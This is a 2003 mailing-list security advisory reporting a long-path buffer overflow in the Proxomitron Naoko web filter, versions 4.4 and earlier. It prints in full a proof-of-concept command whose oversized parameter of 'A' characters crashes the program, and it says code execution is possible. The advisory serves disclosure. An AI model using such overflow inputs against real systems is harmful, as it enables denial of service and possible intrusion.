[VulnWatch] [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS

From: Grégory Le Bras | Security Corporation (gregory.lebras@security-corp.org)
Date: 02/19/03

Next message: Frog Man: "[VulnWatch] Myguestbook (PHP)"

Previous message: pokleyzz: "[VulnWatch] Cpanel 5 and below remote command execution and local root vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: Grégory Le Bras | Security Corporation <gregory.lebras@security-corp.org>
To: <vulnwatch@vulnwatch.org>
Date: Wed, 19 Feb 2003 21:23:33 +0100

.: Proxomitron Naoko Long Path Buffer Overflow/DoS :.
________________________________________________________________________

Security Corporation Security Advisory [SCSA-005]
________________________________________________________________________

PROGRAM: The Proxomitron Naoko
HOMEPAGE: http://www.proxomitron.org/
VULNERABLE VERSIONS: 4.4 and prior
________________________________________________________________________

DESCRIPTION
________________________________________________________________________

The Proxomitron is an Universal Web Filter.
(direct quote from Proxomitron website)

DETAILS & EXPLOITS
________________________________________________________________________

Sending a parameter with a buffer of 1024 bytes in length or more, causes
Proxomitron Naoko to crash.

This vulnerability can be easily exploited to execute code.

Exploitation example :

c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA

SOLUTIONS
________________________________________________________________________

No solution for the moment.

VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified

LINKS
________________________________________________________________________

French Version : http://www.security-corp.org/advisories/SCSA-005-FR.txt

------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------

Next message: Frog Man: "[VulnWatch] Myguestbook (PHP)"
Previous message: pokleyzz: "[VulnWatch] Cpanel 5 and below remote command execution and local root vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]